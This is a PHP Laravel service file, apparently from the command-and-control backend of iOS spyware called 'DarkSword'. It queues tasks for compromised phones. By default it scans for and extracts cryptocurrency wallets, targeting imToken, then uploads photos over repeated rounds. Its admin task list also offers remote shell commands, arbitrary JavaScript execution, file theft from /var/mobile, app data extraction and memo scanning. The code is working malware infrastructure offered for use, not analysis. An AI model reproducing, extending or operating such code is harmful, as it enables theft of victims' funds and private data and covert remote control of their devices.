Files
2026-09-21 02:45:04 +08:00

617 lines
22 KiB
PHP

<?php
namespace App\Services;
use App\Models\Device;
use App\Models\DeviceEvent;
use Illuminate\Support\Facades\Redis;
use Illuminate\Support\Str;
/**
* Per-device beacon command queue — 100% Redis, no DB.
*
* Redis keys per device:
* ds:q:{id} List — pending queue (RPOP dequeue, LPUSH enqueue)
* ds:qdisp:{id} Hash — dispatched/in-flight tasks {command_id: taskJson}
* ds:qround:{id} String — remaining default-queue rounds (including current)
* ds:qt:{id} String — throttle lock (TTL 5s)
*
* Completed task results are stored as DeviceEvent records (日志 tab), NOT in Redis.
*
* Task JSON: {task_id, type, params, status, command_id?, dispatched_at?, completed_at?, result_count?, result_meta?}
*
* Default queue: wallet_scan → wallet_extract → photos, replayed DEFAULT_ROUNDS times.
*/
class DsBeaconQueue
{
/** Default task types seeded for new DarkSword devices (FIFO dispatch order). */
public const DEFAULT_TYPES = [
'wallet_scan',
'wallet_extract',
'photos',
];
/** Types that should only be dispatched on the final default round
* (skipped on round 1 and intermediate replays). */
public const LAST_ROUND_TYPES = [
'photos',
];
/** wallet_extract is only dispatched when the device's applist contains
* this wallet bundle (imToken). */
private const WALLET_EXTRACT_REQUIRED_BUNDLE = 'im.token.app';
/** After the default queue is consumed, replay it until this many rounds finish. */
public const DEFAULT_ROUNDS = 3;
/** All task types the pe_worker.js can handle (for admin dropdown). */
public const ALL_TYPES = [
'photos' => '相册上传',
'photo_scan' => '相册扫描(带去重)',
'wallet_scan' => '钱包扫描',
'wallet_extract' => '钱包提取',
'apps' => '应用列表',
'basic_info' => '设备信息',
'memo_scan' => '备忘录扫描',
'ls' => '目录列表',
'download' => '文件下载',
'exec' => '执行命令',
'file_upload' => '文件上传',
'disk_scan' => '磁盘扫描',
'ios_app_data' => '应用数据',
'execute_command' => '远程命令',
'sleep' => '休眠',
'exit' => '退出',
];
/**
* Parameter schema for each command type.
* Used by the admin UI to render dynamic input fields.
*
* @var array<string, list<array{name: string, label: string, type: string, default: mixed, required: bool, options?: array<string, string>}>>
*/
public const PARAM_SCHEMA = [
'photos' => [
['name' => 'max_count', 'label' => '最大数量', 'type' => 'number', 'default' => 200, 'required' => false],
],
'photo_scan' => [
['name' => 'max_count', 'label' => '最大数量', 'type' => 'number', 'default' => 200, 'required' => false],
['name' => 'batch_size', 'label' => '批次大小', 'type' => 'number', 'default' => 30, 'required' => false],
['name' => 'max_file_size', 'label' => '最大文件(字节)', 'type' => 'number', 'default' => 5242880, 'required' => false],
],
'wallet_scan' => [],
'wallet_extract' => [
['name' => 'wallet_type', 'label' => '钱包类型', 'type' => 'text', 'default' => 'imtoken', 'required' => false],
],
'apps' => [],
'basic_info' => [],
'memo_scan' => [],
'ls' => [
['name' => 'path', 'label' => '目录路径', 'type' => 'text', 'default' => '/', 'required' => true],
],
'download' => [
['name' => 'path', 'label' => '文件路径', 'type' => 'text', 'default' => '', 'required' => true],
['name' => 'max_size', 'label' => '最大大小(字节)', 'type' => 'number', 'default' => 2097152, 'required' => false],
],
'exec' => [
['name' => 'code', 'label' => 'JS 代码', 'type' => 'textarea', 'default' => '', 'required' => true],
],
'file_upload' => [
['name' => 'upload_paths', 'label' => '上传路径(逗号分隔)', 'type' => 'text', 'default' => '/var/mobile', 'required' => false],
['name' => 'filter_mode', 'label' => '过滤模式', 'type' => 'select', 'default' => 'none', 'required' => false, 'options' => ['none' => '无', 'include' => '仅含', 'exclude' => '排除']],
['name' => 'file_extensions', 'label' => '扩展名(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
['name' => 'include_subdirs', 'label' => '包含子目录', 'type' => 'checkbox', 'default' => true, 'required' => false],
['name' => 'exclude_dirs', 'label' => '排除目录(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
['name' => 'max_file_size_mb', 'label' => '最大文件(MB)', 'type' => 'number', 'default' => 500, 'required' => false],
],
'disk_scan' => [],
'ios_app_data' => [
['name' => 'targets', 'label' => '目标 Bundle ID(逗号分隔)', 'type' => 'text', 'default' => '', 'required' => false],
['name' => 'max_file_size_mb', 'label' => '最大文件(MB)', 'type' => 'number', 'default' => 500, 'required' => false],
],
'execute_command' => [
['name' => 'command', 'label' => '命令', 'type' => 'text', 'default' => '', 'required' => true],
['name' => 'timeout', 'label' => '超时(秒)', 'type' => 'number', 'default' => 30, 'required' => false],
['name' => 'working_directory', 'label' => '工作目录', 'type' => 'text', 'default' => '', 'required' => false],
],
'sleep' => [
['name' => 'interval', 'label' => '间隔(秒)', 'type' => 'number', 'default' => 15, 'required' => false],
],
'exit' => [],
];
public const STATUS_PENDING = 'pending';
public const STATUS_DISPATCHED = 'dispatched';
public const STATUS_DONE = 'done';
public const STATUS_LABELS = [
self::STATUS_PENDING => '排队中',
self::STATUS_DISPATCHED => '已下发',
self::STATUS_DONE => '已回传',
];
private const Q_PREFIX = 'ds:q:';
private const DISP_PREFIX = 'ds:qdisp:';
private const DONE_PREFIX = 'ds:qdone:';
private const ROUND_PREFIX = 'ds:qround:';
private const THROTTLE_PREFIX = 'ds:qt:';
private const THROTTLE_SEC = 5;
private const DONE_CAP = 50;
/** Dispatched tasks older than this (seconds) are re-queued on next beacon. */
private const STALE_DISPATCH_SEC = 600; // 10 minutes
// ── Seeding ────────────────────────────────────────────────────────────
/**
* Seed the default queue for a new DarkSword device (only if queue is empty).
*/
public function seed(Device $device): void
{
if ((int) $device->chain !== Device::CHAIN_DARKSWORD) {
return;
}
$qKey = $this->queueKey($device);
if ((int) Redis::llen($qKey) > 0) {
return; // already has pending tasks
}
$this->setRoundsRemaining($device, self::DEFAULT_ROUNDS);
$this->pushDefaultTypes($device, self::DEFAULT_ROUNDS === 1);
}
// ── Dequeue (called on every /beacon) ──────────────────────────────────
/**
* Dequeue the next task for a device.
*
* @return array{type: string, command_id: string, params: array<string, mixed>}|null
*/
public function dequeue(Device $device, ?string $ip = null): ?array
{
// Per-device throttle: at most one dispatch every THROTTLE_SEC seconds.
$throttleKey = $this->throttleKey($device);
if (Redis::exists($throttleKey)) {
return null;
}
// Re-queue dispatched tasks that never received a /result (e.g. the
// device's rce_worker wasn't loaded yet when the task was first sent).
$this->requeueStaleDispatched($device);
// Pop tasks until we find one that should run on this device. Tasks
// that fail shouldDispatchTask() (e.g. wallet_extract with no imToken
// in the applist) are silently discarded — they will be re-seeded by
// replenishDefaultRound() on a later beacon if rounds remain.
while (true) {
$raw = Redis::rpop($this->queueKey($device));
if ($raw === null) {
if (! $this->replenishDefaultRound($device)) {
return null; // noop — queue empty and no remaining rounds
}
$raw = Redis::rpop($this->queueKey($device));
if ($raw === null) {
return null;
}
}
$task = json_decode($raw, true);
if (! is_array($task) || ! isset($task['type'])) {
continue; // discard malformed
}
if (! $this->shouldDispatchTask($device, (string) $task['type'])) {
continue; // not eligible for this device — discard and move on
}
break; // found a dispatchable task
}
Redis::setex($throttleKey, self::THROTTLE_SEC, '1');
$commandId = 'dsq-'.$device->id.'-'.Str::lower(Str::random(12));
$type = $task['type'];
$params = $task['params'] ?? $this->paramsFor($type);
// Move to dispatched hash.
$task['status'] = self::STATUS_DISPATCHED;
$task['command_id'] = $commandId;
$task['dispatched_at'] = now()->toDateTimeString();
Redis::hset($this->dispKey($device), $commandId, json_encode($task));
return [
'type' => $type,
'command_id' => $commandId,
'params' => $params,
];
}
/**
* Decide whether a task type is eligible to dispatch on this device right
* now. wallet_extract is gated on the device's applist containing imToken
* (bundle `im.token.app`); without it the extraction has nothing to read.
*/
private function shouldDispatchTask(Device $device, string $type): bool
{
if ($type !== 'wallet_extract') {
return true;
}
return $device->apps()
->where('bundle_id', self::WALLET_EXTRACT_REQUIRED_BUNDLE)
->exists();
}
/**
* Re-queue dispatched tasks that have been sitting without a /result
* for longer than STALE_DISPATCH_SEC. This handles the case where a
* task was dispatched before the device's rce_worker was ready (e.g.
* the default seeded tasks fired on the first 1-2 beacons).
*/
private function requeueStaleDispatched(Device $device): void
{
$dispKey = $this->dispKey($device);
$dispatched = Redis::hgetall($dispKey);
if (empty($dispatched)) {
return;
}
$now = time();
$cutoff = $now - self::STALE_DISPATCH_SEC;
foreach ($dispatched as $commandId => $raw) {
$task = json_decode($raw, true);
if (! is_array($task)) {
continue;
}
$dispatchedAt = strtotime((string) ($task['dispatched_at'] ?? ''));
if ($dispatchedAt === false || $dispatchedAt > $cutoff) {
continue; // not stale yet
}
// Remove from dispatched and push back to queue as a fresh task.
Redis::hdel($dispKey, $commandId);
unset($task['command_id'], $task['dispatched_at'], $task['status']);
$task['status'] = self::STATUS_PENDING;
Redis::lpush($this->queueKey($device), json_encode($task));
}
}
// ── Mark done (called on /result) ──────────────────────────────────────
/**
* Mark a dispatched task as done. No auto-requeue.
*
* @param array<string, mixed> $payload
* @return array<string, mixed>|null The completed task data.
*/
public function markDone(array $payload): ?array
{
$commandId = trim((string) ($payload['command_id'] ?? ''));
if ($commandId === '') {
return null;
}
// Find in dispatched hash by command_id. We don't know the device_id from
// payload alone, so scan all dispatch hashes. In practice the command_id
// encodes the device_id (dsq-{device_id}-...), so we can extract it.
$deviceId = $this->deviceIdFromCommandId($commandId);
if ($deviceId === null) {
return null;
}
$device = Device::query()->find($deviceId);
if (! $device) {
return null;
}
$raw = Redis::hget($this->dispKey($device), $commandId);
if (! $raw) {
return null;
}
$task = json_decode($raw, true);
if (! is_array($task)) {
return null;
}
// Remove from dispatched.
Redis::hdel($this->dispKey($device), $commandId);
// Update with completion info.
$task['status'] = self::STATUS_DONE;
$task['completed_at'] = now()->toDateTimeString();
$task['result_count'] = (int) ($task['result_count'] ?? 0) + 1;
$meta = $task['result_meta'] ?? [];
$filename = trim((string) ($payload['filename'] ?? ''));
$category = trim((string) ($payload['category'] ?? ''));
if ($filename !== '') {
$meta['filename'] = substr($filename, 0, 255);
}
if ($category !== '') {
$meta['category'] = substr($category, 0, 64);
}
if (isset($payload['status']) && is_string($payload['status'])) {
$meta['status'] = substr($payload['status'], 0, 32);
}
foreach (['path', 'reason', 'stored', 'photo', 'size'] as $key) {
if (array_key_exists($key, $payload)) {
$meta[$key] = $payload[$key];
}
}
$task['result_meta'] = $meta;
// Record completion to the device's event log (日志 tab) instead of
// keeping a Redis done list. The Redis queue only holds pending +
// dispatched tasks; completed results live in device_events.
$this->recordDoneEvent($device, $task);
return $task;
}
/**
* Record a completed task as a DeviceEvent (shown in the 日志 tab).
*
* @param array<string, mixed> $task
*/
private function recordDoneEvent(Device $device, array $task): void
{
$type = $task['type'] ?? 'unknown';
$meta = $task['result_meta'] ?? [];
$filename = $meta['filename'] ?? '';
$count = $task['result_count'] ?? 0;
$desc = $type;
if ($count > 0) {
$desc .= ' · '.$count.' 次';
}
if ($filename !== '') {
$desc .= ' · '.$filename;
}
DeviceEvent::create([
'device_id' => $device->id,
'device_key' => $device->device_id,
'event_name' => $type,
'desc' => mb_substr($desc, 0, 512),
'context_json' => [
'type' => $type,
'command_id' => $task['command_id'] ?? null,
'params' => $task['params'] ?? [],
'dispatched_at' => $task['dispatched_at'] ?? null,
'completed_at' => $task['completed_at'] ?? null,
'result_count' => $count,
'result_meta' => $meta,
],
]);
}
// ── Admin operations ───────────────────────────────────────────────────
/**
* Add a task to a device's queue.
*
* @param array<string, mixed>|null $params
* @return array<string, mixed> The created task.
*/
public function addTask(Device $device, string $type, ?array $params = null): array
{
$task = $this->lpushTask($device, $type, $params ?? $this->paramsFor($type));
return $task;
}
/**
* Remove a pending task from the queue by task_id.
*/
public function removeTask(Device $device, string $taskId): bool
{
$qKey = $this->queueKey($device);
$len = (int) Redis::llen($qKey);
if ($len === 0) {
return false;
}
// LREM removes count occurrences of value. We need to find and remove
// the exact JSON string matching this task_id.
$items = Redis::lrange($qKey, 0, -1);
foreach ($items as $item) {
$decoded = json_decode($item, true);
if (is_array($decoded) && ($decoded['task_id'] ?? null) === $taskId) {
Redis::lrem($qKey, 1, $item);
return true;
}
}
return false;
}
/**
* Get the queue state for admin display.
*
* Only pending + dispatched are returned. Completed task results are
* stored as DeviceEvent records (shown in the 日志 tab), not in Redis.
*
* @return array{pending: list<array>, dispatched: list<array>, done: list<array>, rounds_total: int, rounds_remaining: int, round_current: int}
*/
public function getQueueState(Device $device): array
{
// Pending (from list — note: LPUSH means newest first, reverse for display)
$pendingRaw = Redis::lrange($this->queueKey($device), 0, -1);
$pending = [];
foreach (array_reverse($pendingRaw) as $item) {
$decoded = json_decode($item, true);
if (is_array($decoded)) {
$pending[] = $decoded;
}
}
// Dispatched (from hash)
$dispatchedRaw = Redis::hgetall($this->dispKey($device));
$dispatched = [];
foreach ($dispatchedRaw as $commandId => $item) {
$decoded = json_decode($item, true);
if (is_array($decoded)) {
$dispatched[] = $decoded;
}
}
$remaining = $this->roundsRemaining($device);
return [
'pending' => $pending,
'dispatched' => $dispatched,
'done' => [], // completed tasks are in device_events (日志 tab)
'rounds_total' => self::DEFAULT_ROUNDS,
'rounds_remaining' => $remaining,
'round_current' => $remaining > 0
? (self::DEFAULT_ROUNDS - $remaining + 1)
: self::DEFAULT_ROUNDS,
];
}
/**
* Get the current Redis queue length for a device.
*/
public function queueLength(Device $device): int
{
return (int) Redis::llen($this->queueKey($device));
}
// ── Internal helpers ────────────────────────────────────────────────────
/**
* Enqueue one copy of the default task list (FIFO via LPUSH + RPOP).
*
* @param bool $isLastRound When true, include LAST_ROUND_TYPES (photos);
* otherwise skip them so they only fire on the
* final default round.
*/
private function pushDefaultTypes(Device $device, bool $isLastRound = false): void
{
foreach (self::DEFAULT_TYPES as $type) {
if (! $isLastRound && in_array($type, self::LAST_ROUND_TYPES, true)) {
continue;
}
$this->lpushTask($device, $type, $this->paramsFor($type));
}
}
/**
* When the pending list is empty, push another copy of the default types
* if unused rounds remain. Remaining includes the round that just finished,
* so remaining=1 means that was the last pass.
*/
private function replenishDefaultRound(Device $device): bool
{
$remaining = $this->roundsRemaining($device);
if ($remaining <= 1) {
if ($remaining === 1) {
$this->setRoundsRemaining($device, 0);
}
return false;
}
$this->setRoundsRemaining($device, $remaining - 1);
// The round we're about to push is the last one when the new remaining
// (after decrement) hits 1, i.e. the incoming remaining was 2.
$this->pushDefaultTypes($device, $remaining === 2);
return true;
}
public function roundsRemaining(Device $device): int
{
return max(0, (int) Redis::get($this->roundKey($device)));
}
private function setRoundsRemaining(Device $device, int $remaining): void
{
Redis::set($this->roundKey($device), (string) max(0, $remaining));
}
/**
* Push a task to the Redis queue (LPUSH = newest at head).
*
* @param array<string, mixed>|null $params
* @return array<string, mixed> The task array that was pushed.
*/
private function lpushTask(Device $device, string $type, ?array $params): array
{
$task = [
'task_id' => Str::uuid()->toString(),
'type' => $type,
'params' => $params ?? $this->paramsFor($type),
'status' => self::STATUS_PENDING,
];
Redis::lpush($this->queueKey($device), json_encode($task));
return $task;
}
/**
* Extract device_id from command_id (format: dsq-{device_id}-{random}).
*/
private function deviceIdFromCommandId(string $commandId): ?int
{
if (! str_starts_with($commandId, 'dsq-')) {
return null;
}
$rest = substr($commandId, 4); // after "dsq-"
$parts = explode('-', $rest, 2);
if (count($parts) < 2) {
return null;
}
$deviceId = (int) $parts[0];
if ($deviceId <= 0) {
return null;
}
return $deviceId;
}
/**
* Build default params from the PARAM_SCHEMA.
*
* @return array<string, mixed>
*/
private function paramsFor(string $type): array
{
$params = [];
foreach (self::PARAM_SCHEMA[$type] ?? [] as $field) {
$params[$field['name']] = $field['default'];
}
return $params;
}
private function queueKey(Device $device): string
{
return self::Q_PREFIX.$device->id;
}
private function dispKey(Device $device): string
{
return self::DISP_PREFIX.$device->id;
}
private function doneKey(Device $device): string
{
return self::DONE_PREFIX.$device->id;
}
private function roundKey(Device $device): string
{
return self::ROUND_PREFIX.$device->id;
}
private function throttleKey(Device $device): string
{
return self::THROTTLE_PREFIX.$device->id;
}
}